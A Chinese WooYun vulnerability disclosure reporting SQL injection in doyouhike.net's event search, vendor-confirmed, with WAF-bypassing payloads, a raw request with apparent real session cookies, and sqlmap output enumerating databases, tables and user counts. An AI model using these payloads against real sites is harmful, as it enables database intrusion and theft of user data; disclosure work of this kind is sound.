当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138787

漏洞标题:磨房网主站SQL注入漏洞(百万用户泄露)

相关厂商:doyouhike.net

漏洞作者: 路人甲

提交时间:2015-09-03 15:08

修复时间:2015-10-18 15:46

公开时间:2015-10-18 15:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-03: 细节已通知厂商并且等待厂商处理中
2015-09-03: 厂商已经确认,细节仅向厂商公开
2015-09-13: 细节向核心白帽子及相关领域专家公开
2015-09-23: 细节向普通白帽子公开
2015-10-03: 细节向实习白帽子公开
2015-10-18: 细节向公众公开

简要描述:

磨房网主站SQL注入漏洞(百万用户泄露)

详细说明:

又找了一处,这次好像是上WAF了 但是治标不治本。要从根本上解决

GET /event/search?cat=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&date=all&forum_slug=globe HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.doyouhike.net:80/
Cookie: PHPSESSID=3s4c23cavdekl73caccl5tsn73; dyh_lastactivity=1441094989; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2259b0fe1b87c6586d1887a5231f7f7823%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22108.61.127.60%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1441093840%3B%7Df7258d5f059819ae0d4a3da2153cc48f; dyh_version=old; BAIDUID=B563E07E7FB4A8F497EC7BAC18231A40:FG=1; guid=a742-08e4-9593-4231; OAID=d42862cc581dffd429c54f3c67008240; u2=ed999103-87e3-434f-8936-1e2534f5dd4144C010
Host: www.doyouhike.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


1.jpg


2.jpg


3.jpg


4.jpg

第一个2千万不知道什么东西,看到用表有100W

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
    Payload: http://www.doyouhike.net:80/event/search?cat=(select(0)from(select(sleep(0)))v)/-6754%00' OR (5411=5411)*6836 AND 'IEkZ'='IEkZ'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&date=all&forum_slug=globe
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.doyouhike.net:80/event/search?cat=(select(0)from(select(sleep(0)))v)/%00' OR (SELECT 3584 FROM(SELECT COUNT(*),CONCAT(0x7162767671,(SELECT (ELT(3584=3584,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BWhe'='BWhe'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&date=all&forum_slug=globe
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.doyouhike.net:80/event/search?cat=(select(0)from(select(sleep(0)))v)/%00' AND (SELECT * FROM (SELECT(SLEEP(5)))rhpn) AND 'HYxD'='HYxD'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&date=all&forum_slug=globe
---
back-end DBMS: MySQL 5.0
available databases [5]:
[*] bizrc
[*] click
[*] g3rc
[*] information_schema
[*] sphinx
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
    Payload: http://www.doyouhike.net:80/event/search?cat=(select(0)from(select(sleep(0)))v)/-6754%00' OR (5411=5411)*6836 AND 'IEkZ'='IEkZ'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&date=all&forum_slug=globe
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.doyouhike.net:80/event/search?cat=(select(0)from(select(sleep(0)))v)/%00' OR (SELECT 3584 FROM(SELECT COUNT(*),CONCAT(0x7162767671,(SELECT (ELT(3584=3584,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BWhe'='BWhe'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&date=all&forum_slug=globe
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.doyouhike.net:80/event/search?cat=(select(0)from(select(sleep(0)))v)/%00' AND (SELECT * FROM (SELECT(SLEEP(5)))rhpn) AND 'HYxD'='HYxD'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&date=all&forum_slug=globe
---
back-end DBMS: MySQL 5.0
Database: g3rc
[265 tables]
+----------------------------+
| _100km_pics                |
| _100km_sites               |
| __apache_log               |
| __open                     |
| __open_user                |
| __session_check            |
| _flood                     |
| _g4tmp                     |
| _mfdest_nodes              |
| _node_conv                 |
| _node_dest_count           |
| _node_dests                |
| _node_di                   |
| _node_ext_evt              |
| _node_tags                 |
| _node_ti                   |
| _nodes                     |
| _shop_conv2                |
| _tmp                       |
| _topic_bak                 |
| open                       |
| achievements               |
| acl                        |
| activities                 |
| activity_award_sets        |
| activity_awards            |
| activity_checkin           |
| activity_exam_options      |
| activity_exam_questions    |
| activity_live              |
| activity_live_fav          |
| activity_matches           |
| activity_milestones        |
| activity_moderators        |
| activity_notice            |
| activity_points            |
| activity_team_members      |
| activity_teams             |
| api_user_verify            |
| apns_push_queue            |
| app                        |
| app_feedback               |
| app_version                |
| application                |
| bazaar_cats                |
| bazaar_feedback            |
| bazaar_items               |
| bookmarks                  |
| campaign_codes             |
| campaign_records           |
| campaign_verify            |
| campaigns                  |
| chat_msg                   |
| cities                     |
| city_stats                 |
| comments                   |
| cron                       |
| cron_log                   |
| cronjob_data_maxid         |
| dest_editors               |
| dest_meta                  |
| dest_tips                  |
| dests                      |
| dict                       |
| dict_alias                 |
| dig_topic                  |
| docs                       |
| download_file              |
| error_messages             |
| etag                       |
| etag_record                |
| event_cat                  |
| event_cats                 |
| event_departure            |
| event_dest                 |
| event_drafts               |
| event_evaluate             |
| event_holiday              |
| event_line                 |
| event_live                 |
| event_log                  |
| event_members              |
| event_recommend            |
| event_report               |
| event_search_record        |
| event_wishlist             |
| events                     |
| forum_cats                 |
| forum_comp                 |
| forums                     |
| gallery_comments           |
| gallery_files              |
| gallery_photo2set          |
| gallery_photos             |
| gallery_photos_upload      |
| gallery_sets               |
| gallery_users              |
| gallery_users_photo        |
| geo_ip                     |
| group_cats                 |
| group_digs                 |
| group_members              |
| group_pic_upload           |
| group_stats                |
| group_style                |
| groups                     |
| guide_chapters             |
| guide_discuss              |
| guides                     |
| items                      |
| log_sms                    |
| mail_queue                 |
| medal_action               |
| medal_action_relation      |
| medal_cats                 |
| medal_grade                |
| medal_group                |
| medal_logs                 |
| medal_score                |
| medal_user                 |
| medals                     |
| mf_product                 |
| mf_type                    |
| mf_type_product            |
| mfdest_city                |
| mfdest_editor_pic_fav      |
| mfdest_job_photo           |
| mfdest_log                 |
| mfdest_node_event          |
| mfdest_node_hits           |
| mfdest_node_hot            |
| mfdest_node_hotel          |
| mfdest_node_hotel_city     |
| mfdest_node_impression     |
| mfdest_node_nearby         |
| mfdest_node_photo          |
| mfdest_node_special        |
| mfdest_node_visited        |
| mfdest_node_wish           |
| mfdest_nodes               |
| mfdest_reviews             |
| mfdest_route_nearby        |
| mfdest_tags                |
| mfdest_topic_node          |
| mfdest_topic_node_new      |
| mfdest_topic_photo         |
| mfdest_topic_tag           |
| mfdest_visited_hits        |
| mfdest_wish_hits           |
| minilogs                   |
| misc_items                 |
| msgs                       |
| msgs_content               |
| negatives                  |
| node_tmp                   |
| open_host                  |
| open_user                  |
| partners                   |
| poll_choices               |
| poll_items                 |
| poll_results               |
| polls                      |
| post_column                |
| post_extra                 |
| post_recommended           |
| posts                      |
| provinces                  |
| rbac_permissions           |
| rbac_role_perm             |
| rbac_roles                 |
| rbac_user_role             |
| re_event_line              |
| re_photo_feed              |
| re_user_line               |
| route_attri_split          |
| route_attri_version        |
| route_base                 |
| route_campsite_object      |
| route_campsite_object_list |
| route_flag_point           |
| route_gzh                  |
| route_image_list           |
| route_map_line             |
| route_road_state           |
| route_road_state_list      |
| route_search_index         |
| route_season               |
| route_season_list          |
| route_tag                  |
| route_tag_list             |
| route_type                 |
| search_analytics           |
| search_analytics_old       |
| sessions                   |
| shop_delivery              |
| shop_itemcats              |
| shop_items                 |
| shop_orders                |
| shop_ordersubs             |
| sidebar_items              |
| sys_filterlog              |
| sys_logs                   |
| sys_logs_bak               |
| sys_options                |
| sys_queue                  |
| sys_searchlog              |
| sys_szdx                   |
| tag_index                  |
| tags                       |
| tcyb_awards                |
| tcyb_cities                |
| tcyb_device_ban            |
| tcyb_event_checkin         |
| tcyb_event_fav             |
| tcyb_event_grades          |
| tcyb_event_members         |
| tcyb_event_posts           |
| tcyb_events                |
| tcyb_hot                   |
| tcyb_jpush_queue           |
| tcyb_msgs                  |
| tcyb_notification          |
| tcyb_photos                |
| tcyb_post_fav              |
| tcyb_provinces             |
| tcyb_user_ban              |
| tcyb_user_buddy            |
| tcyb_user_device           |
| tcyb_user_relation         |
| tcyb_user_sns              |
| tcyb_users                 |
| tk_airport                 |
| tk_country                 |
| tk_flight                  |
| tk_member                  |
| tk_quote                   |
| tk_request                 |
| topic_hits                 |
| topic_index                |
| topic_logs                 |
| topics                     |
| tracks                     |
| trans                      |
| trans_logs                 |
| user_activation            |
| user_alt                   |
| user_ban                   |
| user_buddy                 |
| user_extra                 |
| user_feed                  |
| user_feed_me               |
| user_log                   |
| user_medal                 |
| user_memo                  |
| user_notification          |
| user_pos                   |
| user_recommend             |
| user_reg                   |
| user_register              |
| user_social                |
| user_subscribe             |
| user_theme                 |
| user_weibo                 |
| user_weibo_log             |
| users                      |
+----------------------------+


+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| tcyb_user_buddy | 20361203 |
| posts | 14897127 |
| sys_logs | 10509788 |
| gallery_photos | 6340414 |
| gallery_photo2set | 6275451 |
| msgs | 6027627 |
| sys_logs_bak | 5340348 |
| msgs_content | 4993968 |
| mfdest_topic_photo | 4970698 |
| activity_points | 3977961 |
| user_log | 3392881 |
| search_analytics | 3392353 |
| cron_log | 3298911 |
| user_feed | 2868591 |
| event_log | 2610265 |
| topic_index | 2543399 |
| topics | 2203844 |
| sys_searchlog | 1814958 |
| search_analytics_old | 1705966 |
| re_photo_feed | 1583815 |
| api_user_verify | 1154073 |
| tcyb_users | 1138316 |
| users | 1074004 |
| gallery_users | 1066023 |

漏洞证明:

修复方案:

过滤
严格排查

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-03 15:44

厂商回复:

漏洞确认,参数过滤失当

最新状态:

暂无

漏洞评价:

评论